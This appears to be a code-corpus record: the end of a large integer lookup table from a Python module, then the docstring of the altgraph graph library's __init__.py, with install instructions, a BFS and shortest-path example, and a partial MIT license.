4627,4628,4629,4630,4631,4632,4633,4634,4635,4636,4637,4638,4639,4640,4641,4642,
4643,4644,4645,4646,4647,4648,4649,1361,4650,4651,4652,4653,4654,4655,4656,4657,
4658,4659,4660,4661,1362,4662,4663,4664,4665,4666,4667,4668,4669,4670,4671,4672,
4673,4674,4675,4676,4677,4678,4679,4680,4681,4682,1629,4683,4684,4685,4686,4687,
1630,4688,4689,4690,4691,1153,4692,4693,4694,1113,4695,4696,4697,4698,4699,4700,
4701,4702,4703,4704,4705,4706,4707,4708,4709,4710,4711,1197,4712,4713,4714,4715,
4716,4717,4718,4719,4720,4721,4722,4723,4724,4725,4726,4727,4728,4729,4730,4731,
4732,4733,4734,4735,1631,4736,1632,4737,4738,4739,4740,4741,4742,4743,4744,1633,
4745,4746,4747,4748,4749,1262,4750,4751,4752,4753,4754,1363,4755,4756,4757,4758,
4759,4760,4761,4762,4763,4764,4765,4766,4767,4768,1634,4769,4770,4771,4772,4773,
4774,4775,4776,4777,4778,1635,4779,4780,4781,4782,4783,4784,4785,4786,4787,4788,
4789,1636,4790,4791,4792,4793,4794,4795,4796,4797,4798,4799,4800,4801,4802,4803,
4804,4805,4806,1637,4807,4808,4809,1638,4810,4811,4812,4813,4814,4815,4816,4817,
4818,1639,4819,4820,4821,4822,4823,4824,4825,4826,4827,4828,4829,4830,4831,4832,
4833,1077,4834,4835,4836,4837,4838,4839,4840,4841,4842,4843,4844,4845,4846,4847,
4848,4849,4850,4851,4852,4853,4854,4855,4856,4857,4858,4859,4860,4861,4862,4863,
4864,4865,4866,4867,4868,4869,4870,4871,4872,4873,4874,4875,4876,4877,4878,4879,
4880,4881,4882,4883,1640,4884,4885,1641,4886,4887,4888,4889,4890,4891,4892,4893,
4894,4895,4896,4897,4898,4899,4900,4901,4902,4903,4904,4905,4906,4907,4908,4909,
4910,4911,1642,4912,4913,4914,1364,4915,4916,4917,4918,4919,4920,4921,4922,4923,
4924,4925,4926,4927,4928,4929,4930,4931,1643,4932,4933,4934,4935,4936,4937,4938,
4939,4940,4941,4942,4943,4944,4945,4946,4947,4948,4949,4950,4951,4952,4953,4954,
4955,4956,4957,4958,4959,4960,4961,4962,4963,4964,4965,4966,4967,4968,4969,4970,
4971,4972,4973,4974,4975,4976,4977,4978,4979,4980,1644,4981,4982,4983,4984,1645,
4985,4986,1646,4987,4988,4989,4990,4991,4992,4993,4994,4995,4996,4997,4998,4999,
5000,5001,5002,5003,5004,5005,1647,5006,1648,5007,5008,5009,5010,5011,5012,1078,
5013,5014,5015,5016,5017,5018,5019,5020,5021,5022,5023,5024,5025,5026,5027,5028,
1365,5029,5030,5031,5032,5033,5034,5035,5036,5037,5038,5039,1649,5040,5041,5042,
5043,5044,5045,1366,5046,5047,5048,5049,5050,5051,5052,5053,5054,5055,1650,5056,
5057,5058,5059,5060,5061,5062,5063,5064,5065,5066,5067,5068,5069,5070,5071,5072,
5073,5074,5075,5076,5077,1651,5078,5079,5080,5081,5082,5083,5084,5085,5086,5087,
5088,5089,5090,5091,5092,5093,5094,5095,5096,5097,5098,5099,5100,5101,5102,5103,
5104,5105,5106,5107,5108,5109,5110,1652,5111,5112,5113,5114,5115,5116,5117,5118,
1367,5119,5120,5121,5122,5123,5124,5125,5126,5127,5128,5129,1653,5130,5131,5132,
5133,5134,5135,5136,5137,5138,5139,5140,5141,5142,5143,5144,5145,5146,5147,5148,
5149,1368,5150,1654,5151,1369,5152,5153,5154,5155,5156,5157,5158,5159,5160,5161,
5162,5163,5164,5165,5166,5167,5168,5169,5170,5171,5172,5173,5174,5175,5176,5177,
5178,1370,5179,5180,5181,5182,5183,5184,5185,5186,5187,5188,5189,5190,5191,5192,
5193,5194,5195,5196,5197,5198,1655,5199,5200,5201,5202,1656,5203,5204,5205,5206,
1371,5207,1372,5208,5209,5210,5211,1373,5212,5213,1374,5214,5215,5216,5217,5218,
5219,5220,5221,5222,5223,5224,5225,5226,5227,5228,5229,5230,5231,5232,5233,5234,
5235,5236,5237,5238,5239,5240,5241,5242,5243,5244,5245,5246,5247,1657,5248,5249,
5250,5251,1658,1263,5252,5253,5254,5255,5256,1375,5257,5258,5259,5260,5261,5262,
5263,5264,5265,5266,5267,5268,5269,5270,5271,5272,5273,5274,5275,5276,5277,5278,
5279,5280,5281,5282,5283,1659,5284,5285,5286,5287,5288,5289,5290,5291,5292,5293,
5294,5295,5296,5297,5298,5299,5300,1660,5301,5302,5303,5304,5305,5306,5307,5308,
5309,5310,5311,5312,5313,5314,5315,5316,5317,5318,5319,5320,5321,1376,5322,5323,
5324,5325,5326,5327,5328,5329,5330,5331,5332,5333,1198,5334,5335,5336,5337,5338,
5339,5340,5341,5342,5343,1661,5344,5345,5346,5347,5348,5349,5350,5351,5352,5353,
5354,5355,5356,5357,5358,5359,5360,5361,5362,5363,5364,5365,5366,5367,5368,5369,
5370,5371,5372,5373,5374,5375,5376,5377,5378,5379,5380,5381,5382,5383,5384,5385,
5386,5387,5388,5389,5390,5391,5392,5393,5394,5395,5396,5397,5398,1264,5399,5400,
5401,5402,5403,5404,5405,5406,5407,5408,5409,5410,5411,5412,1662,5413,5414,5415,
5416,1663,5417,5418,5419,5420,5421,5422,5423,5424,5425,5426,5427,5428,5429,5430,
5431,5432,5433,5434,5435,5436,5437,5438,1664,5439,5440,5441,5442,5443,5444,5445,
5446,5447,5448,5449,5450,5451,5452,5453,5454,5455,5456,5457,5458,5459,5460,5461,
5462,5463,5464,5465,5466,5467,5468,5469,5470,5471,5472,5473,5474,5475,5476,5477,
5478,1154,5479,5480,5481,5482,5483,5484,5485,1665,5486,5487,5488,5489,5490,5491,
5492,5493,5494,5495,5496,5497,5498,5499,5500,5501,5502,5503,5504,5505,5506,5507,
5508,5509,5510,5511,5512,5513,5514,5515,5516,5517,5518,5519,5520,5521,5522,5523,
5524,5525,5526,5527,5528,5529,5530,5531,5532,5533,5534,5535,5536,5537,5538,5539,
5540,5541,5542,5543,5544,5545,5546,5547,5548,1377,5549,5550,5551,5552,5553,5554,
5555,5556,5557,5558,5559,5560,5561,5562,5563,5564,5565,5566,5567,5568,5569,5570,
1114,5571,5572,5573,5574,5575,5576,5577,5578,5579,5580,5581,5582,5583,5584,5585,
5586,5587,5588,5589,5590,5591,5592,1378,5593,5594,5595,5596,5597,5598,5599,5600,
5601,5602,5603,5604,5605,5606,5607,5608,5609,5610,5611,5612,5613,5614,1379,5615,
5616,5617,5618,5619,5620,5621,5622,5623,5624,5625,5626,5627,5628,5629,5630,5631,
5632,5633,5634,1380,5635,5636,5637,5638,5639,5640,5641,5642,5643,5644,5645,5646,
5647,5648,5649,1381,1056,5650,5651,5652,5653,5654,5655,5656,5657,5658,5659,5660,
1666,5661,5662,5663,5664,5665,5666,5667,5668,1667,5669,1668,5670,5671,5672,5673,
5674,5675,5676,5677,5678,1155,5679,5680,5681,5682,5683,5684,5685,5686,5687,5688,
5689,5690,5691,5692,5693,5694,5695,5696,5697,5698,1669,5699,5700,5701,5702,5703,
5704,5705,1670,5706,5707,5708,5709,5710,1671,5711,5712,5713,5714,1382,5715,5716,
5717,5718,5719,5720,5721,5722,5723,5724,5725,1672,5726,5727,1673,1674,5728,5729,
5730,5731,5732,5733,5734,5735,5736,1675,5737,5738,5739,5740,5741,5742,5743,5744,
1676,5745,5746,5747,5748,5749,5750,5751,1383,5752,5753,5754,5755,5756,5757,5758,
5759,5760,5761,5762,5763,5764,5765,5766,5767,5768,1677,5769,5770,5771,5772,5773,
1678,5774,5775,5776, 998,5777,5778,5779,5780,5781,5782,5783,5784,5785,1384,5786,
5787,5788,5789,5790,5791,5792,5793,5794,5795,5796,5797,5798,5799,5800,1679,5801,
5802,5803,1115,1116,5804,5805,5806,5807,5808,5809,5810,5811,5812,5813,5814,5815,
5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828,5829,5830,5831,
5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844,5845,5846,5847,
5848,5849,5850,5851,5852,5853,5854,5855,1680,5856,5857,5858,5859,5860,5861,5862,
5863,5864,1681,5865,5866,5867,1682,5868,5869,5870,5871,5872,5873,5874,5875,5876,
5877,5878,5879,1683,5880,1684,5881,5882,5883,5884,1685,5885,5886,5887,5888,5889,
5890,5891,5892,5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,
5906,5907,1686,5908,5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,
5921,5922,5923,5924,5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,1687,
5936,5937,5938,5939,5940,5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,
5952,1688,1689,5953,1199,5954,5955,5956,5957,5958,5959,5960,5961,1690,5962,5963,
5964,5965,5966,5967,5968,5969,5970,5971,5972,5973,5974,5975,5976,5977,5978,5979,
5980,5981,1385,5982,1386,5983,5984,5985,5986,5987,5988,5989,5990,5991,5992,5993,
5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004,6005,6006,6007,6008,6009,
6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020,6021,6022,6023,6024,6025,
6026,6027,1265,6028,6029,1691,6030,6031,6032,6033,6034,6035,6036,6037,6038,6039,
6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052,6053,6054,6055,
6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068,6069,6070,6071,
6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084,1692,6085,6086,
6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100,6101,6102,
6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116,6117,6118,
6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,1693,6132,6133,
6134,6135,6136,1694,6137,6138,6139,6140,6141,1695,6142,6143,6144,6145,6146,6147,
6148,6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,
6164,6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,
6180,6181,6182,6183,6184,6185,1696,6186,6187,6188,6189,6190,6191,6192,6193,6194,
6195,6196,6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,
6211,6212,6213,6214,6215,6216,6217,6218,6219,1697,6220,6221,6222,6223,6224,6225,
6226,6227,6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,
6242,6243,6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,1698,6254,6255,6256,
6257,6258,6259,6260,6261,6262,6263,1200,6264,6265,6266,6267,6268,6269,6270,6271, #1024
6272,6273,6274,6275,6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,6286,6287,
6288,6289,6290,6291,6292,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,1699,
6303,6304,1700,6305,6306,6307,6308,6309,6310,6311,6312,6313,6314,6315,6316,6317,
6318,6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,
6334,6335,6336,6337,6338,6339,1701,6340,6341,6342,6343,6344,1387,6345,6346,6347,
6348,6349,6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,
6364,6365,6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,
6380,6381,6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,
6396,6397,6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,6411,
6412,6413,1702,6414,6415,6416,6417,6418,6419,6420,6421,6422,1703,6423,6424,6425,
6426,6427,6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,1704,6439,6440,
6441,6442,6443,6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,6455,6456,
6457,6458,6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,
6473,6474,6475,6476,6477,6478,6479,6480,6481,6482,6483,6484,6485,6486,6487,6488,
6489,6490,6491,6492,6493,6494,6495,6496,6497,6498,6499,6500,6501,6502,6503,1266,
6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516,6517,6518,6519,
6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532,6533,6534,6535,
6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548,6549,6550,6551,
1705,1706,6552,6553,6554,6555,6556,6557,6558,6559,6560,6561,6562,6563,6564,6565,
6566,6567,6568,6569,6570,6571,6572,6573,6574,6575,6576,6577,6578,6579,6580,6581,
6582,6583,6584,6585,6586,6587,6588,6589,6590,6591,6592,6593,6594,6595,6596,6597,
6598,6599,6600,6601,6602,6603,6604,6605,6606,6607,6608,6609,6610,6611,6612,6613,
6614,6615,6616,6617,6618,6619,6620,6621,6622,6623,6624,6625,6626,6627,6628,6629,
6630,6631,6632,6633,6634,6635,6636,6637,1388,6638,6639,6640,6641,6642,6643,6644,
1707,6645,6646,6647,6648,6649,6650,6651,6652,6653,6654,6655,6656,6657,6658,6659,
6660,6661,6662,6663,1708,6664,6665,6666,6667,6668,6669,6670,6671,6672,6673,6674,
1201,6675,6676,6677,6678,6679,6680,6681,6682,6683,6684,6685,6686,6687,6688,6689,
6690,6691,6692,6693,6694,6695,6696,6697,6698,6699,6700,6701,6702,6703,6704,6705,
6706,6707,6708,6709,6710,6711,6712,6713,6714,6715,6716,6717,6718,6719,6720,6721,
6722,6723,6724,6725,1389,6726,6727,6728,6729,6730,6731,6732,6733,6734,6735,6736,
1390,1709,6737,6738,6739,6740,6741,6742,1710,6743,6744,6745,6746,1391,6747,6748,
6749,6750,6751,6752,6753,6754,6755,6756,6757,1392,6758,6759,6760,6761,6762,6763,
6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777,6778,6779,
6780,1202,6781,6782,6783,6784,6785,6786,6787,6788,6789,6790,6791,6792,6793,6794,
6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806,6807,6808,6809,1711,
6810,6811,6812,6813,6814,6815,6816,6817,6818,6819,6820,6821,6822,6823,6824,6825,
6826,6827,6828,6829,6830,6831,6832,6833,6834,6835,6836,1393,6837,6838,6839,6840,
6841,6842,6843,6844,6845,6846,6847,6848,6849,6850,6851,6852,6853,6854,6855,6856,
6857,6858,6859,6860,6861,6862,6863,6864,6865,6866,6867,6868,6869,6870,6871,6872,
6873,6874,6875,6876,6877,6878,6879,6880,6881,6882,6883,6884,6885,6886,6887,6888,
6889,6890,6891,6892,6893,6894,6895,6896,6897,6898,6899,6900,6901,6902,1712,6903,
6904,6905,6906,6907,6908,6909,6910,1713,6911,6912,6913,6914,6915,6916,6917,6918,
6919,6920,6921,6922,6923,6924,6925,6926,6927,6928,6929,6930,6931,6932,6933,6934,
6935,6936,6937,6938,6939,6940,6941,6942,6943,6944,6945,6946,6947,6948,6949,6950,
6951,6952,6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,
6967,6968,6969,6970,6971,6972,6973,6974,1714,6975,6976,6977,6978,6979,6980,6981,
6982,6983,6984,6985,6986,6987,6988,1394,6989,6990,6991,6992,6993,6994,6995,6996,
6997,6998,6999,7000,1715,7001,7002,7003,7004,7005,7006,7007,7008,7009,7010,7011,
7012,7013,7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,
7028,1716,7029,7030,7031,7032,7033,7034,7035,7036,7037,7038,7039,7040,7041,7042,
7043,7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,
7059,7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,7071,7072,7073,7074,
7075,7076,7077,7078,7079,7080,7081,7082,7083,7084,7085,7086,7087,7088,7089,7090,
7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105,7106,
7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,7119,7120,7121,7122,
7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136,7137,7138,
7139,7140,7141,7142,7143,7144,7145,7146,7147,7148,7149,7150,7151,7152,7153,7154,
7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167,7168,7169,7170,
7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183,7184,7185,7186,
7187,7188,7189,7190,7191,7192,7193,7194,7195,7196,7197,7198,7199,7200,7201,7202,
7203,7204,7205,7206,7207,1395,7208,7209,7210,7211,7212,7213,1717,7214,7215,7216,
7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229,7230,7231,7232,
7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245,7246,7247,7248,
7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261,7262,7263,7264,
7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277,7278,7279,7280,
7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293,7294,7295,7296,
7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308,7309,7310,7311,7312,
7313,1718,7314,7315,7316,7317,7318,7319,7320,7321,7322,7323,7324,7325,7326,7327,
7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339,7340,7341,7342,7343,
7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,7354,7355,7356,7357,7358,7359,
7360,7361,7362,7363,7364,7365,7366,7367,7368,7369,7370,7371,7372,7373,7374,7375,
7376,7377,7378,7379,7380,7381,7382,7383,7384,7385,7386,7387,7388,7389,7390,7391,
7392,7393,7394,7395,7396,7397,7398,7399,7400,7401,7402,7403,7404,7405,7406,7407,
7408,7409,7410,7411,7412,7413,7414,7415,7416,7417,7418,7419,7420,7421,7422,7423,
7424,7425,7426,7427,7428,7429,7430,7431,7432,7433,7434,7435,7436,7437,7438,7439,
7440,7441,7442,7443,7444,7445,7446,7447,7448,7449,7450,7451,7452,7453,7454,7455,
7456,7457,7458,7459,7460,7461,7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,
7472,7473,7474,7475,7476,7477,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,
7488,7489,7490,7491,7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,7503,
7504,7505,7506,7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,
7520,7521,7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,
7536,7537,7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,7550,7551,
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567,
7568,7569,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582,7583,
7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598,7599,
7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614,7615,
7616,7617,7618,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628,7629,7630,7631,
7632,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643,7644,7645,7646,7647,
7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659,7660,7661,7662,7663,
7664,7665,7666,7667,7668,7669,7670,7671,7672,7673,7674,7675,7676,7677,7678,7679,
7680,7681,7682,7683,7684,7685,7686,7687,7688,7689,7690,7691,7692,7693,7694,7695,
7696,7697,7698,7699,7700,7701,7702,7703,7704,7705,7706,7707,7708,7709,7710,7711,
7712,7713,7714,7715,7716,7717,7718,7719,7720,7721,7722,7723,7724,7725,7726,7727,
7728,7729,7730,7731,7732,7733,7734,7735,7736,7737,7738,7739,7740,7741,7742,7743,
7744,7745,7746,7747,7748,7749,7750,7751,7752,7753,7754,7755,7756,7757,7758,7759,
7760,7761,7762,7763,7764,7765,7766,7767,7768,7769,7770,7771,7772,7773,7774,7775,
7776,7777,7778,7779,7780,7781,7782,7783,7784,7785,7786,7787,7788,7789,7790,7791,
7792,7793,7794,7795,7796,7797,7798,7799,7800,7801,7802,7803,7804,7805,7806,7807,
7808,7809,7810,7811,7812,7813,7814,7815,7816,7817,7818,7819,7820,7821,7822,7823,
7824,7825,7826,7827,7828,7829,7830,7831,7832,7833,7834,7835,7836,7837,7838,7839,
7840,7841,7842,7843,7844,7845,7846,7847,7848,7849,7850,7851,7852,7853,7854,7855,
7856,7857,7858,7859,7860,7861,7862,7863,7864,7865,7866,7867,7868,7869,7870,7871,
7872,7873,7874,7875,7876,7877,7878,7879,7880,7881,7882,7883,7884,7885,7886,7887,
7888,7889,7890,7891,7892,7893,7894,7895,7896,7897,7898,7899,7900,7901,7902,7903,
7904,7905,7906,7907,7908,7909,7910,7911,7912,7913,7914,7915,7916,7917,7918,7919,
7920,7921,7922,7923,7924,7925,7926,7927,7928,7929,7930,7931,7932,7933,7934,7935,
7936,7937,7938,7939,7940,7941,7942,7943,7944,7945,7946,7947,7948,7949,7950,7951,
7952,7953,7954,7955,7956,7957,7958,7959,7960,7961,7962,7963,7964,7965,7966,7967,
7968,7969,7970,7971,7972,7973,7974,7975,7976,7977,7978,7979,7980,7981,7982,7983,
7984,7985,7986,7987,7988,7989,7990,7991,7992,7993,7994,7995,7996,7997,7998,7999,
8000,8001,8002,8003,8004,8005,8006,8007,8008,8009,8010,8011,8012,8013,8014,8015,
8016,8017,8018,8019,8020,8021,8022,8023,8024,8025,8026,8027,8028,8029,8030,8031,
8032,8033,8034,8035,8036,8037,8038,8039,8040,8041,8042,8043,8044,8045,8046,8047,
8048,8049,8050,8051,8052,8053,8054,8055,8056,8057,8058,8059,8060,8061,8062,8063,
8064,8065,8066,8067,8068,8069,8070,8071,8072,8073,8074,8075,8076,8077,8078,8079,
8080,8081,8082,8083,8084,8085,8086,8087,8088,8089,8090,8091,8092,8093,8094,8095,
8096,8097,8098,8099,8100,8101,8102,8103,8104,8105,8106,8107,8108,8109,8110,8111,
8112,8113,8114,8115,8116,8117,8118,8119,8120,8121,8122,8123,8124,8125,8126,8127,
8128,8129,8130,8131,8132,8133,8134,8135,8136,8137,8138,8139,8140,8141,8142,8143,
8144,8145,8146,8147,8148,8149,8150,8151,8152,8153,8154,8155,8156,8157,8158,8159,
8160,8161,8162,8163,8164,8165,8166,8167,8168,8169,8170,8171,8172,8173,8174,8175,
8176,8177,8178,8179,8180,8181,8182,8183,8184,8185,8186,8187,8188,8189,8190,8191,
8192,8193,8194,8195,8196,8197,8198,8199,8200,8201,8202,8203,8204,8205,8206,8207,
8208,8209,8210,8211,8212,8213,8214,8215,8216,8217,8218,8219,8220,8221,8222,8223,
8224,8225,8226,8227,8228,8229,8230,8231,8232,8233,8234,8235,8236,8237,8238,8239,
8240,8241,8242,8243,8244,8245,8246,8247,8248,8249,8250,8251,8252,8253,8254,8255,
8256,8257,8258,8259,8260,8261,8262,8263,8264,8265,8266,8267,8268,8269,8270,8271,
8272,8273,8274,8275,8276,8277,8278,8279,8280,8281,8282,8283,8284,8285,8286,8287,
8288,8289,8290,8291,8292,8293,8294,8295,8296,8297,8298,8299,8300,8301,8302,8303,
8304,8305,8306,8307,8308,8309,8310,8311,8312,8313,8314,8315,8316,8317,8318,8319,
8320,8321,8322,8323,8324,8325,8326,8327,8328,8329,8330,8331,8332,8333,8334,8335,
8336,8337,8338,8339,8340,8341,8342,8343,8344,8345,8346,8347,8348,8349,8350,8351,
8352,8353,8354,8355,8356,8357,8358,8359,8360,8361,8362,8363,8364,8365,8366,8367,
8368,8369,8370,8371,8372,8373,8374,8375,8376,8377,8378,8379,8380,8381,8382,8383,
8384,8385,8386,8387,8388,8389,8390,8391,8392,8393,8394,8395,8396,8397,8398,8399,
8400,8401,8402,8403,8404,8405,8406,8407,8408,8409,8410,8411,8412,8413,8414,8415,
8416,8417,8418,8419,8420,8421,8422,8423,8424,8425,8426,8427,8428,8429,8430,8431,
8432,8433,8434,8435,8436,8437,8438,8439,8440,8441,8442,8443,8444,8445,8446,8447,
8448,8449,8450,8451,8452,8453,8454,8455,8456,8457,8458,8459,8460,8461,8462,8463,
8464,8465,8466,8467,8468,8469,8470,8471,8472,8473,8474,8475,8476,8477,8478,8479,
8480,8481,8482,8483,8484,8485,8486,8487,8488,8489,8490,8491,8492,8493,8494,8495,
8496,8497,8498,8499,8500,8501,8502,8503,8504,8505,8506,8507,8508,8509,8510,8511,
8512,8513,8514,8515,8516,8517,8518,8519,8520,8521,8522,8523,8524,8525,8526,8527,
8528,8529,8530,8531,8532,8533,8534,8535,8536,8537,8538,8539,8540,8541,8542,8543,
8544,8545,8546,8547,8548,8549,8550,8551,8552,8553,8554,8555,8556,8557,8558,8559,
8560,8561,8562,8563,8564,8565,8566,8567,8568,8569,8570,8571,8572,8573,8574,8575,
8576,8577,8578,8579,8580,8581,8582,8583,8584,8585,8586,8587,8588,8589,8590,8591,
8592,8593,8594,8595,8596,8597,8598,8599,8600,8601,8602,8603,8604,8605,8606,8607,
8608,8609,8610,8611,8612,8613,8614,8615,8616,8617,8618,8619,8620,8621,8622,8623,
8624,8625,8626,8627,8628,8629,8630,8631,8632,8633,8634,8635,8636,8637,8638,8639,
8640,8641,8642,8643,8644,8645,8646,8647,8648,8649,8650,8651,8652,8653,8654,8655,
8656,8657,8658,8659,8660,8661,8662,8663,8664,8665,8666,8667,8668,8669,8670,8671,
8672,8673,8674,8675,8676,8677,8678,8679,8680,8681,8682,8683,8684,8685,8686,8687,
8688,8689,8690,8691,8692,8693,8694,8695,8696,8697,8698,8699,8700,8701,8702,8703,
8704,8705,8706,8707,8708,8709,8710,8711,8712,8713,8714,8715,8716,8717,8718,8719,
8720,8721,8722,8723,8724,8725,8726,8727,8728,8729,8730,8731,8732,8733,8734,8735,
8736,8737,8738,8739,8740,8741)
# flake8: noqa
| mit |
joaormatos/anaconda | Anaconda/standalone/trunk/PyInstaller/lib/altgraph/__init__.py | 12 | 4907 | '''
altgraph - a python graph library
=================================
altgraph is a fork of `graphlib <http://pygraphlib.sourceforge.net>`_ tailored
to use newer Python 2.3+ features, including additional support used by the
py2app suite (modulegraph and macholib, specifically).
altgraph is a Python-based graph (network) representation and manipulation package.
It started out as an extension to the `graph_lib module <http://www.ece.arizona.edu/~denny/python_nest/graph_lib_1.0.1.html>`_
written by Nathan Denny; it has been significantly optimized and expanded.
The :class:`altgraph.Graph.Graph` class is loosely modeled after the `LEDA <http://www.algorithmic-solutions.com/enleda.htm>`_
(Library of Efficient Datatypes) representation. The library
includes methods for constructing graphs, BFS and DFS traversals,
topological sort, finding connected components, shortest paths as well as a number
graph statistics functions. The library can also visualize graphs
via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_.
The package contains the following modules:
- the :py:mod:`altgraph.Graph` module contains the :class:`~altgraph.Graph.Graph` class that stores the graph data
- the :py:mod:`altgraph.GraphAlgo` module implements graph algorithms operating on graphs (:py:class:`~altgraph.Graph.Graph` instances)
- the :py:mod:`altgraph.GraphStat` module contains functions for computing statistical measures on graphs
- the :py:mod:`altgraph.GraphUtil` module contains functions for generating, reading and saving graphs
- the :py:mod:`altgraph.Dot` module contains functions for displaying graphs via `graphviz <http://www.research.att.com/sw/tools/graphviz/>`_
- the :py:mod:`altgraph.ObjectGraph` module implements a graph of objects with a unique identifier
Installation
------------
Download and unpack the archive, then type::
python setup.py install
This will install the library in the default location. For instructions on
how to customize the install procedure, read the output of::
python setup.py --help install
To verify that the code works run the test suite::
python setup.py test
Example usage
-------------
Let's assume that we want to analyze the graph below (links to the full picture) GRAPH_IMG.
Our script might then look like this::
from altgraph import Graph, GraphAlgo, Dot
# these are the edges
edges = [ (1,2), (2,4), (1,3), (2,4), (3,4), (4,5), (6,5),
(6,14), (14,15), (6, 15), (5,7), (7, 8), (7,13), (12,8),
(8,13), (11,12), (11,9), (13,11), (9,13), (13,10) ]
# creates the graph
graph = Graph.Graph()
for head, tail in edges:
graph.add_edge(head, tail)
# do a forward bfs starting from node 1
print graph.forw_bfs(1)
This will print the nodes in some breadth-first order::
[1, 2, 3, 4, 5, 7, 8, 13, 11, 10, 12, 9]
If we wanted to get the hop-distance from node 1 to node 8
we could write::
print graph.get_hops(1, 8)
This will print the following::
[(1, 0), (2, 1), (3, 1), (4, 2), (5, 3), (7, 4), (8, 5)]
Node 1 is at 0 hops since it is the starting node, nodes 2,3 are 1 hop away ...
node 8 is 5 hops away. To find the shortest distance between two nodes you
can use::
print GraphAlgo.shortest_path(graph, 1, 12)
It will print the nodes on one of the shortest paths (if there is more than one)::
[1, 2, 4, 5, 7, 13, 11, 12]
To display the graph we can use the GraphViz backend::
dot = Dot.Dot(graph)
# display the graph on the monitor
dot.display()
# save it in an image file
dot.save_img(file_name='graph', file_type='gif')
..
@author: U{Istvan Albert<http://www.personal.psu.edu/staff/i/u/iua1/>}
@license: MIT License
Copyright (c) 2004 Istvan Albert unless otherwise noted.
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do
so.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE
FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
